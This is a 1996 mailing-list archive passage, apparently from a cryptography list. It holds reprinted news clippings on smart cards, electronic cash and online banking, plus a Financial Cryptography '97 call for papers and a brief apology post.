From dlv at bwalk.dm.com Fri Sep 20 12:29:24 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 21 Sep 1996 03:29:24 +0800 Subject: [NEWS] Crypto-relevant wire clippings Message-ID: <3R7JuD3w165w@bwalk.dm.com> News Release (Environics): Monday, September 16, 1996 Smart Card Forum Draws 500 Industry & Government Leaders SAN FRANCISCO-- The Smart Card Forum today announced that more than 500 industry and government leaders met at its Annual Meeting in San Francisco to review the progress of smart card technology and to lay the foundation for the accelerating pace of its adoption during 1997. Representatives from a "who's who" of government and corporate America gained first-hand information and senior-level perspectives that will help them make strategic decisions around the use of smart cards in emerging markets such as payment, network security, relationship banking, remote data access, and cellular phone security. The way in which the combination of PC and smart card technologies will accelerate the deployment of new applications providing a greater security and portability on the Internet was an area of particular interest. "As these exciting new applications are created and gain momentum during the next five years," says Jean McKenna, Forum President, "the smart card becomes a logical vehicle for distributed information management, identification, security and payment." According to McKenna, who also is V.P. Payment Technologies, Visa International, "The impact will be revolutionary, widespread and positive -- especially for consumers." 
Speakers on the theme: The History of Money - The Future of Payments: Past, Present and Future Perspectives on How Commerce is Enabled, included: -- Martin Mayer, author of The Bankers and numerous financial and business books and Guest Scholar at The Brookings Institution in Washington, D.C.; -- Peter Hill, Executive Vice President, Visa International; and -- Michel Ugon, Vice President, R&D, Bull CP8, and early developer of the microprocessor smart card. 1996 will be looked at as the year when stored value applications on smart cards started serious deployment in North America. The 1996 Annual Meeting reflected the crest of this wave with presentations today on four leading stored value card implementations. The speakers were: -- Cynthia Bengier, Vice President, Wells Fargo, for Mondex International; -- Edgar Brown, Vice President, First Union National Bank, for Visa Cash; -- Michael Bradley, Project Manager, Bank of Montreal, for Proton; and -- Lin D. Ison, Executive Manager, Smart Card Systems, Commonwealth Bank of Australia, for MasterCard Cash. The next wave in smart technology The next wave coming that will capture more and more energy of the Forum and its members is the Internet. The combination of PCs and smart cards will promote the development of new applications that tie security and portability together. "The emergence of 'virtual' merchants and the expansion of mechanized payment options promises to offer consumers, merchants, and financial institutions a broad set of new opportunities," says Roger Bertman, Vice President and General Manager, Internet Commerce, VeriFone. "In particular, the Internet will offer a whole new world of selling and buying, and the mechanization of what has been cash will provide a basis for expanded purchasing options. 
The smart card will clearly be the 'glue' that will enable the disparate worlds of physical and 'virtual' merchants and a broad spectrum of payment methods to be brought together in order to tap these opportunities." Interoperability was among the pivotal issues addressed by Gerald Smith, Manager, Smart Consumer Services, IBM. "As smart card implementations evolve from single to multiple-applications and from single to multiple-issuer services, the subject of interoperability is gaining increased scrutiny," says Smith. To achieve critical mass, interoperability between cards and reading devices is required. Panelists addressing the future directions and strategies of payment included: -- Janet Hartung, SVP, Wells Fargo; -- Marlee Laks, Technology Leader, American Express; -- Tim Steward, EVP, Mondex International; -- John Tunstall, VP, MasterCard International; -- Bette Wasserman, VP, Bank of America; and -- Gaylen Howe, Visa International. John D. Wright, Senior Counsel, Wells Fargo, and John Burke, Partner, Foley, Hoag & Eliot LLP, moderated a panel discussion of key legal, public policy and private issues presented by a multi-application smart card, including Regulation E, FDIC insurance and relevant state laws. Consumer and merchant research shows smart card potential A new Forum study made public at the meeting indicates that merchants are quickly focusing on the many other benefits smart cards offer, beyond the stored value application, and they see different benefits to be derived from the technology. These benefits include customer information, offering loyalty or "frequent shopper" programs, electronic ticketing and couponing and stored value for self-service purchases. A second important finding of the study is that a surprisingly low level of customer base penetration is required for many merchants to realize the benefits of smart cards. 
Grocery stores, convenience stores, movie theaters and gasoline retailers indicated that a mere two to 10 percent of consumers -- an extremely low threshold of marketplace demand -- is required for them to realize the benefits of smart card implementation. "A smart card, as opposed to a magnetic stripe card, has the capability of storing information, monetary value, processing transactions off-line, and enhancing a consumer's security and privacy," McKenna says. "Merchants are quickly focusing on the many benefits smart cards can offer both them and consumers." Consumers also favor multi-application smart cards -- 61 percent responded positively in Forum research. They prefer multi-application smart cards in order to carry and access information needed in an emergency and to reduce the number of cards carried, paper records kept and forms to be filled out. The Smart Card Forum The Smart Card Forum is a non-profit, multi-industry membership organization promoting the widespread acceptance of multiple application smart card technology in North America. Its primary mission is to bring together in an open forum, leaders from both the private and public sectors to address topics associated with the development and evolution of smart card technology applications. The Forum was established in September 1993 and currently has more than 225 corporate and government members including: Chase Manhattan, Citibank, Bellcore, MCI, MasterCard, Visa, IBM, Microsoft, Mobil Oil, Schlumberger, Gemplus, Delta Airlines, U.S. Postal Service, the Federal Reserve, U.S. Department of Treasury and U.S. Department of Defense. Associated Press: September Wednesday, September 18, 1996 As Electronic Cash Emerges In U.S., Regulation In Question By Guy Dixon NEW YORK-- As microchip-embedded smart cards hit the market, U.S. banks and credit-card companies are hedging their bets. 
They don't want regulations that prevent new applications for smart-card technology - from simple cashless purchases to potential uses like bank or credit-card fund transfers, all with a single card. But they also quietly welcome rules that could boost their market share over other companies issuing competing smart cards. The main issue is whether the U.S. Federal Reserve Board will require smart-card issuers to provide receipts for all sorts of electronic cash transactions, a move that could play to the strength of the credit card issuers that now dominate electronic transactions by applying rules they must follow already for conventional credit and debit cards. Established card companies which have dominated the U.S. credit-card market since the 1960s are hoping government policy on electronic cash will follow the lines of current bank and credit card regulation. To address some of these concerns, the U.S. Treasury will host a conference on September 19-20 in Washington, D.C. on the role of government in electronic money and banking. Scheduled speakers include Treasury Secretary Robert Rubin, Federal Reserve Board Chairman Alan Greenspan, and Citicorp Chairman and CEO John Reed. So far, the Fed is taking a wait-and-see approach on emerging electronic money. 'The general consensus is that we don't want to over-regulate and stifle innovation,' said Washington Fed spokesman Joe Coyne. Yet as new digital cash products hit the market, many say regulators will have to adapt existing rules to the emerging electronic cash market. Banks, in particular, worry that if regulation is too lax, all sorts of non-financial companies could flood the market with alternative cash forms. They worry about being driven out of the electronic market by competition, said Gerald O'Driscoll, vice-president and director of policy analysis at Citicorp. 
Analysts point out that regional and long-distance phone companies, along with other large and trusted companies, could easily market their own smart cards to customers, such as a smart-card version of AT&T Corp.'s Universal card. Indeed, AT&T is collaborating with National Westminster Bank PLC to develop smart cards in the U.S. The problem with any new regulation is that no one knows what type of smart cards the market will embrace. Smart cards are currently being test-marketed primarily as stored-value cards, holding a limited cash amount that a cardholder can use for purchases until the card runs out. Yet with a smart card's microchip able to hold up to 80 times more information than the magnetic strips on conventional credit cards, many in the industry see the distinctions between bank cards, credit cards and store-value cards blurring to the point where a single smart card could do the work of all three. European credit cards already commonly come equipped with microchips, allowing merchants to verify a payment at the point of purchase. And stored-valued telecom cards with tiny chips are everywhere. 'In the end, it comes down to which features people will pay for,' said Lawrence White, economist and electronic commerce analyst at the University of Georgia. 'And that is the danger of regulation jumping the gun.' Visa USA's test run of smart cards in Atlanta during the Olympic Games featured cards that used only a fraction of a microchip's potential. The cards stored amounts of up to $100 which cardholders could then draw on for purchases. Some Atlanta banks, such as First Union, went one step further, issuing cards whose value could be reloaded. In another promotional blitz, participants at Vancouver's international AIDS conference this summer could buy VISA Cash cards for use at conference venues. Later this year, VISA plans another trial run of stored-value smart cards in Manhattan's Upper West Side with MasterCard, Citibank and Chase Manhattan. 
These smart cards, typically sold in $10, $20, $50 and $100 denominations, differ from debit cards, such as checking cards which already are being distributed widely by many banks in the United States and Canada. When a debit card is inserted into a merchant's card reader, the amount of the purchase is deducted from the buyer's bank account. Because there is a transfer of funds, the merchant's card-reading device has to be connected to a bank or credit card company by phone lines. Smart cards, however, can transfer a certain amount of funds from the card itself to a card-reading device usually without having to go on-line. Not all smart cards are alike. A leading competitor to VISA Cash and MasterCard's smart cards is National Westminster Bank's Mondex card, now being test-marketed in the U.K. and soon in Canada. Mondex cards are stored-value cards, with the added feature that the funds can be transferred electronically to another Mondex card, allowing a card-owner to give money to someone else in the same way one can with cash, said Fred Billings, a Mondex developer at the Royal Bank of Canada. AT&T is currently in an alliance with NatWest to develop the Mondex card in the U.S., said Mitch Montagna, spokesman for AT&T Universal Card Services. VISA's technology, on the other hand, is geared more toward the company's long-term approach of sticking to established credit-card billing and account practices, a traditional market niche VISA wants to hold on to with affiliated banks, said VISA USA Executive Vice-President Rosalind Fisher. 'We are riding that horse right now, but we'll have to see which system the market takes to,' Fisher said. But some digital cash developers continue to worry that any regulatory move, once it comes, may be the wrong one for their product. Much of the debate hinges on Regulation E of the 1976 Electronic Funds Transfer Act, say analysts.
Reg E requires issuers of ATM and other electronic fund transfer cards to provide receipts and account statements to cardholders. It also requires issuers to assume certain liabilities if funds are electronically lost or stolen. Stored-value smart cards are seen as largely exempt from this regulation, at least for the time being. The Fed is still weighing the impact of cards in denominations of $100 or less. But the industry is going on the assumption that stored-value cards of $100 and under will not require receipts or credit statements, said VISA USA's Fisher.

WNET's Future of Money: September 16, 1996

Viewpoints

Is Cyberspace Safe for Financial Transactions Today?

YES. William M. Randle, Senior Vice President and Director of Marketing, Huntington Bancshares, Inc.

Some cyberspace transactions can be made very secure with technology in use today. But... The security currently in place is not ready to safeguard fast, simple, low-cost transactions that would allow customers to order items and authorize direct bank payment to the merchant. That would require the financial information pathways between banks to be protected by public-private key encryption, such as RSA encryption, invulnerable to unauthorized persons. And the value of encryption depends on a reliable authentication procedure, assuring that both senders and receivers of financial information are who they say they are. A variety of solutions to protect every stage of cyberspace transactions have been proposed. I am most impressed with the system in use at Security First National Bank, the first Web-only bank, as well as at Huntington National Bank; it has been approved by the government for secure electronic banking transactions, and has been proven over time. The system server, the Hewlett-Packard Virtual Vault, has been used by the Department of Defense for a number of years, and the banking software was developed by 5 Paces Technology in Atlanta. The problem of authentication is harder to solve.
Real-time settlement of third-party transactions will require all insured financial services institutions to agree on a central trusted authority to provide for the safety and soundness of the future electronic payment system and insure privacy of information for all involved. Not only must the authentication procedure be reliable---it must also be perceived as reliable, and implicitly trusted by buyers and sellers, if electronic commerce is to grow to its full potential. Currently, the banking industry is engaged in a collaborative effort to evaluate the technology that exists today, with a view toward the creation of such an authority. As the group most knowledgeable and experienced in handling money safely and efficiently, and which has long held the public trust in financial matters, it is to be hoped that they succeed. When they do, the answer to the question "is cyberspace safe for financial transactions today?" can be answered with an unqualified Yes." NO. Colin Crook, Senior Technology Officer, Citibank. The fact is that secure financial transactions cannot be assured today in the new and dramatically changing landscape of cyberspace. Market participants need to improve security and learn more about doing business in the electronic marketplace before providing assurance to their customers that they can safely do business there. Companies must be honest with their customers, making them aware of the risks of doing business in cyberspace and providing assurance that the enterprise values the customer's security and privacy. Today we are witnessing a series of experiments in electronic commerce, experiments conducted by all sorts of companies. These opportunities for learning-- on the part of both market participants and customers--will lead to further improved products and to levels of security that approach, or even surpass, the levels present today outside of cyberspace. 
The experiments are challenging the capabilities of both the technology and the enterprise itself, and the willingness of the customer to accept new and often novel ways of doing business. Customers value this kind of experimentation and innovation; however, where the customer's money is concerned, we at Citibank have learned that trust is paramount! In this context, managing the balance of the level of security with the factors of customer convenience and business opportunity becomes the focus in moving forward. Companies must manage risk so as not to compromise customer trust. Because some companies-- mostly non-traditional providers of financial services-- have released products very quickly, a major concern is that ill-conceived or hasty experiments may cause damage to the reputation of the entire marketplace. Because absolute security is impossible, an overriding consideration for security and customer trust must dominate the experiments- -which Citibank and other institutions with long histories of customer relationships emphasize in their approaches to cyberspace transactions. Customers already understand and accept the risks associated with credit cards and other financial instruments. Customers in cyberspace should be aware of the experimental nature of this new business environment and use caution before taking on the risks contained within it. As Senior Vice President and Director of Marketing and Strategic Planning at Huntington Bancshares Inc., William M. Randle has developed direct service channels, including Huntington Access, which uses teleconferencing and other electronic channels in the world's first complete virtual branch offices. On June 2 of this year, Huntington launched a Web-based bank. Colin Crook is Senior Technology Officer, Citibank. 
He is responsible for establishing technology policy and standards, introducing new technology, evaluating the quality and direction of system efforts, and introducing technology policy within the corporation.

---
Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From R.Hirschfeld at cwi.nl Fri Sep 20 12:36:19 1996 From: R.Hirschfeld at cwi.nl (R.Hirschfeld at cwi.nl) Date: Sat, 21 Sep 1996 03:36:19 +0800 Subject: Financial Cryptography '97 Call for Papers Message-ID: <9609201543.AA27824=ray@groen.cwi.nl>

Financial Cryptography '97
February 24-28 1997, Anguilla, BWI

CALL FOR PAPERS

General Information:

Financial Cryptography '97 (FC97) is a new conference on the security of digital financial transactions. The first meeting will be held on the island of Anguilla in the British West Indies on February 24-28, 1997. FC97 aims to bring together persons involved in both the financial and data security fields to foster cooperation and exchange of ideas.

Original papers are solicited on all aspects of financial data security and digital commerce in general, including

    Anonymous Payments          Fungibility
    Authentication              Home Banking
    Communication Security      Identification
    Conditional Access          Implementations
    Copyright Protection        Loss Tolerance
    Credit/Debit Cards          Loyalty Mechanisms
    Currency Exchange           Legal Aspects
    Digital Cash                Micropayments
    Digital Receipts            Network Payments
    Digital Signatures          Privacy Issues
    Economic Implications       Regulatory Issues
    Electronic Funds Transfer   Smart Cards
    Electronic Purses           Standards
    Electronic Voting           Tamper Resistance
    Electronic Wallets          Transferability

Instructions for Authors:

Send a cover letter and 9 copies of an extended abstract to be received by November 29, 1996 (or postmarked by November 15, 1996 and sent via airmail) to the Program Chair at the address given below. The extended abstract should start with the title and an abstract followed by a succinct statement appropriate for a non-specialist reader specifying the subject addressed, its background, the main achievements, and their significance to financial data security. Submissions are limited to 15 single-spaced pages of 12pt type. Notification of acceptance or rejection will be sent to authors no later than January 17, 1997. Authors of accepted papers must guarantee that their paper will be presented at the conference.

Additional Information:

Conference pricing and information on travel, hotels, and Anguilla itself will follow in a separate general announcement.

A very limited number of stipends may be available to those unable to obtain funding to attend the conference. Students whose papers are accepted and who will present the paper themselves are encouraged to apply if such assistance is needed. Requests for stipends should be addressed to one of the General Chairs.

Those interested in becoming a sponsor of FC97 or in purchasing exhibit space, please contact the Exhibits and Sponsorship Manager.

A workshop, intended for anyone with commercial software development experience who wants hands-on familiarity with the issues and technology of financial cryptography, is planned in conjunction with FC97, to be held during the week preceding the conference. For information, please contact one of the General Chairs.

Send Submissions to:

    Rafael Hirschfeld
    FC97 Program Chair
    CWI
    Kruislaan 413
    1098 SJ Amsterdam
    The Netherlands
    email: ray at cwi.nl
    phone: +31 20 592 4169
    fax: +31 20 592 4199

Program Committee:

    Matthew Franklin, AT&T Laboratories--Research, Murray Hill, NJ, USA
    Michael Froomkin, U. Miami School of Law, Coral Gables, FL, USA
    Rafael Hirschfeld, CWI, Amsterdam, The Netherlands
    Arjen Lenstra, Citibank, New York, NY, USA
    Mark Manasse, Digital Equipment Corporation, Palo Alto, CA, USA
    Kevin McCurley, Sandia Laboratories, Albuquerque, NM, USA
    Charles Merrill, McCarter & English, Newark, NJ, USA
    Clifford Neuman, Information Sciences Institute, Marina del Rey, CA, USA
    Sholom Rosen, Citibank, New York, NY, USA
    Israel Sendrovic, Federal Reserve Bank of New York, New York, NY, USA

General Chairs:

    Robert Hettinga, Shipwright, Boston, MA, USA
    Vincent Cate, Offshore Information Services, Anguilla, BWI

Conference, Exhibits, and Sponsorship Manager:

    Julie Rackliffe, Boston, MA, USA

Workshop Leader:

    Ian Goldberg, Berkeley, CA, USA

Financial Cryptography '97 is held in cooperation with the International Association for Cryptologic Research.

A copy of this call for papers as well as other information about the conference will be available at URL http://www.cwi.nl/conferences/FC97.

From dlv at bwalk.dm.com Fri Sep 20 12:41:57 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 21 Sep 1996 03:41:57 +0800 Subject: [NEWS] Crypto-relevant wire clippings Message-ID:

New York Times, Tuesday, September 17, 1996

Intuit Selling Bill-Processing Unit For $227 Million

By LAURIE J. FLYNN

Intuit Inc., the United States' leading seller of personal-finance software, announced Monday that it would sell its electronic bill-payment processing business to its main competitor in that field, Checkfree Corp., for $227.6 million in stock. Intuit, which also announced widening financial losses Monday, now intends to focus on its core software businesses, while expanding its services over the Internet. The deal with Checkfree comes as Intuit is under pressure from the banks it works with, which want to expand their options for electronic bill-processing.
Currently, banks wishing to provide electronic services to consumers using Intuit's popular Quicken personal-finance software have had to operate through Intuit's bill-processing subsidiary, Intuit Services Corp. Lately, consumers and financial institutions have shown a preference for conducting business over the Internet rather than over proprietary networks like Intuit Services. But while Intuit had come to view bill processing as a costly distraction, Checkfree said that adding Intuit's operations would be a cost-effective way of expanding its own main line of business. Checkfree, based in Columbus, Ohio, markets its electronic transaction-processing services exclusively to banks and other financial institutions. Those customers use Checkfree's services to provide home banking and bill payment to consumers. Unlike Intuit's network, Checkfree's operations will work with a variety of personal-finance programs. With the acquisition of the Intuit Services unit, Checkfree gains Intuit's relationships with 39 banks and more than 300,000 electronic bill-processing customers, bringing its total number of bank customers to 181 and its consumer base to nearly 1.2 million. The companies, both of whose stocks surged on the news, said they expected to close the deal by the end of the year, pending regulatory and shareholder approval. Intuit's stock rose $2.125 a share Monday, to $32.25; Checkfree gained $3.1875, to $21.25. Wall Street analysts applauded Intuit's decision to withdraw from what they said amounted to the back end of the transaction-processing business, at a time when more full-fledged electronic commerce may finally be catching on. In the future, analysts said, Intuit's best on-line opportunities will be in providing a consumer ``interface'' to the Internet, rather than getting bogged down in the pipes and plumbing of transaction processing. 
And while Intuit remains the leader in its core business - personal financial-management software - the company is facing increased competition from Microsoft Corp., maker of a program called Microsoft Money. Microsoft had agreed to acquire Intuit in October 1994 in a deal worth roughly $2 billion, but abandoned that plan last year under antitrust scrutiny from the justice department. ``It's a strategy shift,'' Lise Buyer, an analyst at T. Rowe Price in Baltimore, said of Intuit's announcement. ``But it's impressive that Intuit is willing to reverse course so quickly.'' Scott Cook, founder and chairman of Intuit, which is based in Menlo Park, Calif., said that transaction-processing had become a distraction. ``It was a sizable investment of dollars but also of management time and resources, in a business that is not central to our core competencies,'' Cook said. As a result of the deal, which includes the transfer of 12.6 million shares of Checkfree stock, Intuit will acquire a 23 percent stake in Checkfree. Intuit executives said they planned eventually to reduce the company's share to 19.9 percent, in order to operate as a minority shareholder and not have to carry Checkfree's results on Intuit's books. Intuit also announced widening losses for its fiscal fourth quarter ended July 31, which it attributed to recent acquisitions of companies that included Interactive Insurance Services Corp. Including charges, the fourth-quarter net loss grew to $22 million, or 48 cents a share, from $1.4 million, or 3 cents a share, a year earlier. That was in line with analysts' expectations. Checkfree's chief executive and chairman, Peter Kight, said that his company would lose money in 1997 as a result of the Intuit Services acquisition. But he called it a necessary step, as banks step up their on-line efforts.
While the Checkfree acquisition may be subject to government scrutiny, neither analysts nor the companies expect any antitrust delays - primarily because there are other large competitors in the electronic check-clearing business. Last week, for example, IBM added itself to that list, with the announcement of Integrion, a venture with 22 banks to provide electronic bill-processing and other transactions. The Checkfree deal will enable Intuit to concentrate on its growing array of Internet-based on-line services. Bill Harris, Intuit's executive vice president, said Intuit would begin to offer ``front-end'' banking services over the Internet by late next year. American Banker: Tuesday, September 17, 1996 Rumors of MasterCard's Plans To Buy Mondex Nearing Reality By VALERIE BLOCK MasterCard International is nearing an agreement to acquire Mondex, the stored value smart card technology developed by National Westminster Bank of London. The deal, which has been the subject of months of negotiations and rumors, was hinted at in a speech that MasterCard president H. Eugene Lockhart made in China 10 days ago. Officially, MasterCard and Mondex refused to comment, but sources inside both companies confirmed that a deal is imminent. Mr. Lockhart said in his speech that MasterCard would announce a major acquisition in the chip card sector in the next month. According to Reuters, he said the acquisition "would be global in scope and involve an alliance of 20 major banks." He also said MasterCard would own the "intellectual property rights stemming from the deal." National Westminster spun off its smart card unit in July, creating Mondex International Ltd., a joint venture with 17 bank partners worldwide. With three Japanese banks close to announcing Mondex franchises, the 20 banks referred to by Mr. Lockhart would be accounted for. Mr. Lockhart also told Reuters that People's Bank of China is considering a smart card launch. 
He may have mentioned the pending agreement to entice the bank. Mr. Lockhart was in China to promote Maestro, MasterCard's on-line debit brand, which will now be available through the Agricultural Bank of China. Industry observers thought Mondex's incorporation in July laid to rest rumors of a MasterCard takeover, which were circulating all summer. But it may have served to make the smart card company more attractive. "Before the announcement, Mondex looked a little tenuous," said a knowledgeable source. "After the (incorporation), it looked like something of value." The source also said that MasterCard's smart card strategy, which began with considerable fanfare more than two years ago, has fallen short of expectations, prompting Mr. Lockhart to seek a remedy. MasterCard's major smart card venture has been a pilot in Canberra, Australia, which started nine months ago. Visa, by contrast, is running several tests of its stored-value system globally. Several executives responsible for MasterCard's early efforts, including Philip Verdi and Robin Townend, have left the company in recent months. The deal would be a boon to both companies, sources said. While Mondex has increased its clout with incorporation, it's still facing "an uphill battle" to achieve worldwide acceptance, said the source. "Distribution is what you could assume Mondex is after," he added. National Westminster retained ownership of Mondex patents and trademark. It stands to recoup its substantial investment in the technology -- on top of a potential $150 million from Mondex franchise owners -- if the MasterCard deal is consummated. The bank remains a minority shareholder in Mondex International. Though the industry pooh-poohed National Westminster's initial efforts to put the fledgling payments system on the map, persistent marketing -- coupled with a strong technological base -- seems to be paying off. 
Electronic wallets, smart phones, and card-to-card monetary transfers set Mondex apart from some less ambitious smart card programs. With powerful investors like Wells Fargo & Co. in the United States, Royal Bank of Canada, as well as Hongkong and Shanghai Banking Corp., the new brand has gained credibility as a major contender in the chip card market. "Mondex blazed a trail," said Peter Hall, PSI International's managing director of consulting in London. MasterCard would be "buying into a pool of knowledge, buying into the partners," he added. Card industry sources said MasterCard and Mondex have many details to address before they can conclude a deal, including corporate structure and governance. One of the biggest issues will be whether to retain the Mondex trademark or "go with the strength of the MasterCard brand," said a source close to the deal. That decision will be made "down the road," he added. The deal is expected to close within three months. No papers have been signed to date. American Banker: Tuesday, September 17, 1996 Chase to Offer Dealerships Auto Loan Decisions Over Internet By DREW CLARK Chase Manhattan Corp.'s auto financing division has begun using the Internet to provide dealerships with loan-approval decisions. The bank is the first of eight financial institutions that have committed to using the system, developed by International Business Machines Corp. By computerizing loan applications and sending data electronically, Chase officials said the bank can grant approvals in as few as two minutes. "It reduces my costs and adds to dealer satisfaction by getting a quick turnaround," said James B. Brew, president of Chase Automotive Finance Corp. Up to 50% of the division's auto loans will be running through the system within the next 18 months, he said. 
Chase, the largest car lender not affiliated with a car company, is connected to six dealerships currently using the system and will establish connections to 100 dealers with the official introduction in October. Other financial institutions planning to use the on-line system include NationsBank Corp., Charlotte, N.C.; GE Capital Auto Financial Services Inc., Barrington, Ill.; Regions Financial Corp., Birmingham, Ala.; and Citibank Puerto Rico. The auto finance program, residing on the dealer's personal computer, features a user-friendly screen display with step-by-step instructions and error checks. Auto dealers can manually override the screens. The dealer's computer is connected to the Internet through the IBM Global Network, which is also used to retrieve an encrypted report from a credit bureau. The dealer's pre-established "key" decodes the report and causes the screen to display one, two, or three stars - representing poor, fair, or good credit. This gives the dealer an idea of which financial institutions are most likely to approve the loan. "If the consumer is looking over the dealer's shoulder, they don't see the word 'loser' flash on the screen," said Neil Lustig, manager of the project for IBM, explaining the rating system. Although Chase currently is the only bank with a direct Internet connection to the system, the dealer can still send loan applications to other institutions by adding their fax numbers to the screen display. "We piloted this in our Saturn dealership, and it lent to the customer-friendly atmosphere perfectly," said John Burns, a dealer in Hempstead, N.Y. The system costs about $700 a month, but it can also replace existing printers and fax machines. "The old system involved faxing applications which came back with the credit worthiness in a few hours," Mr. Burns said. Now, "the information is going in immediately and is analyzed immediately. If there is a glitch, you can discuss it."
IBM said it plans to extend connections for peripheral services like auto insurance and extended warranties. In about a year, the company plans to publish a World Wide Web site offering auto insurance directly to individual customers, said Mr. Lustig. "When enough people use the Internet, the economic model will change," he said. "If we did that today, we would just disintermediate the dealerships." News Release (Wired): Tuesday, September 17, 1996 Citibank's Retired CEO Walter Wriston on the Future of Money SAN FRANCISCO Though he's in his 70s, Walter Wriston may be the world's most wired banker. As chairman and CEO of Citibank in the '60s, '70s and '80s -- a time when money began turning itself into digital bits and bytes and flowing around the world via satellite transponders and fiber-optic cables -- Wriston was a major force in the creation of the modern, global, technological financial system. Wriston retired in 1984, but his vision of banking is still cutting-edge. In an interview with Thomas Bass in the October issue of Wired, Wriston talks about digital money, the new economy, and prospects for the nation-state in an increasingly borderless, networked world. During Wriston's reign, Citibank became the banking industry's technology leader, guiding its customers away from the local teller window toward a new way of banking -- automated, online, checkless, and international, based on distributed networks of computers and ATMs. When Wriston retired, Citibank was the largest bank in the country, and its investment in computer hardware and software approached US$1.75 billion. In a revealing exchange, Wriston doubts whether banks will be running the financial supermarkets of the future as they continue to lose ground against non-bank financial powerhouses, such as Merrill Lynch and General Electric. Wriston says the future of cash lies in smartcards. 
Already in wide use in France, Japan, and Germany, smartcards can be secure and rechargeable, protected by digital photographs or DNA signatures. According to Wriston, the creation of an international standard for encryption is inevitable "because it's necessary for the safety of the world." What about the export controls on strong encryption imposed by the U.S. government? Wriston says to lift them: "You can buy better stuff in Europe than you can here. We don't have a monopoly on brains." As for censorship on the Net? "There is no way on God's green Earth the government can exercise censorship of the Net in any meaningful way." On the nature of markets, Wriston believes the spread of economic freedom leads to the spread of political freedom. "Markets are self-correcting. That's why I trust markets more than governments. Governments usually aren't self-correcting, until it's too late." Find out why the value of money is hooked to nothing other than the information that flows through it -- in the October issue of Wired. Thomas Bass is the author of "The Eudaemonic Pie." His latest book, "Vietnamerica: The War Comes Home," is published by Soho Press. Wired 4.10 is available on newsstands for US$4.95, by calling 800/SO WIRED, or by sending email to subscriptions at wired.com. Fortune: September 30, 1996 What's New About Digital Cash? By Justin Fox E-money is coming, and it's about time. The advance of "smart cards," digital checks, and Internet cash will change how people shop and do business. Banking should become more efficient and less aggravating. It may even become possible to make money on the Net. But don't let all the conferences, cover stories, and alarmist pronouncements on the subject get you too excited--or scared. E- or no e-, it's still just money. For currency traders and others dealing in huge sums, who have long been able to zap billions of dollars across the globe in seconds, money as electrons isn't anything new.
Nearly 90% of the money that changes hands in the U.S. every day does so electronically. It's that other 10%, which slouches along in the form of cash and checks, that e-money promises to change. And why not? Would anyone wax nostalgic about today's unbearable slowness of check clearing, in which banks that do their bookkeeping on computers hire fleets of airplanes to fly bundles of paper checks around the country every night? It will be years before the planes are grounded, but there are already signs of hope. Lots of regular transfers, like paychecks, are already handled electronically; banks are offering checklike debit cards; and Visa is testing utility bills that are sent out and paid online. Visa, Mastercard, and a British multibank venture called Mondex are rolling out chip-based smart cards that can store digital cash. The card companies, banks, and assorted startups are on the verge of making it easy and (relatively) safe to pay for things over the Internet. These e-money peddlers smell huge opportunities in the $ 4 trillion of U.S. consumer purchases that are still paid for each year with cash and checks. "If we can just electronify a small percentage of that, you can see what that will do to our business," says Carl Pascarella, CEO of Visa USA. A few problems need solving before e-money achieves ubiquity--like fraud and consumer resistance. But credit cards overcame similar problems in the 1960s, and like credit cards, e-money is too compelling not to take off. E-money costs much less to handle than paper cash or checks, and it offers consumers the ease and safety of credit cards without many of their limitations. (Credit card transaction costs make small payments uneconomical; they can only be used to buy things from merchants who are part of the card network; and they do not offer the protection of anonymity.) When e-money does hit it big, it will profoundly change--and greatly expand--electronic commerce. 
Software could be paid for on a per-use basis--a tenth of a cent a time, say. Journalism could be bought by the article. Anybody could set up an online business and instantly rake in revenue. What e-money probably won't do, however, is fundamentally transform the nature of money, although a lot of technoprophets think it will. Auguries tend to vary on a theme: Money and central banks as we know them will disappear, national currencies will become extinct, etc. A particularly alarming Web tract on the topic predicts we'll all be tattooed with something akin to a universal pricing code to make sure we're not using someone else's smart card. Hidden in the code will be the numbers "666." And we all know what that means. Mainstream economic theory has no answer for the 666 contention, but the other concerns (or hopes, depending on who's talking) are pretty easily dismissed as overheated hoo-hah. The one truly revolutionary change in money over the past couple of centuries has been the switch from coins made of precious metals to notes made of paper. It was in 1971, when the world's major currencies threw off their last remaining shackles to gold, that money became imaginary stuff, its value derived purely from trust. Compared with that, switching from paper imaginary money to digital imaginary money simply isn't that big a deal. It won't expand the money supply. It won't of itself make national currencies irrelevant. Digital money can indeed move faster, over mountains and across borders, than paper checks or cash--hence reducing governments' ability to control its flow. But the big money started moving this way in the 1970s, at the time setting off all sorts of alarms about the loss of central bank power. "The striking parallels give the distinct impression that 'we've been here before,' " Fed governor Edward Kelley said at a recent conference. "Then as now, the potential impact on monetary policy of new electronic payment products has been greatly exaggerated." 
Fed governors can be wrong, of course. But since much economic activity will remain forever off line, it's hard to see how e-money could entirely supplant national currencies in the real world. Unless technology makes it possible to digitally pay for and deliver, say, a pizza. When that happens, there will be no denying it: E-money (and e-anchovies) will have transformed the world. --Justin Fox --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From cmefford at avwashington.com Fri Sep 20 12:45:45 1996 From: cmefford at avwashington.com (Chip Mefford) Date: Sat, 21 Sep 1996 03:45:45 +0800 Subject: Public Apology Message-ID: A feller let me know this afternoon that I have been posting with a really irritating .sig I didn't know that sucker was on there. I'm really sorry From dlv at bwalk.dm.com Fri Sep 20 12:48:35 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 21 Sep 1996 03:48:35 +0800 Subject: [NEWS] Crypto-relevant wire clippings Message-ID: <2P7JuD2w165w@bwalk.dm.com> Washington Post: Monday, September 16, 1996 Players With Paperless Money By Michelle Singletary Banking via personal computer is expected to increase 600 percent in the next two years, according to a 1996 technology report by the American Bankers Association and the Ernst & Young accounting firm. Telephone banking is predicted to grow 50 percent over the next two years and some experts estimate that 30 percent of U.S. households will be banking electronically by 2000. Little known to most consumers, the Washington area is home to a small but burgeoning subset of the electronic banking industry. The companies in this emerging market, many of them clustered in Northern Virginia, are helping to build the technological infrastructure that is rapidly changing how, when and where consumers bank. 
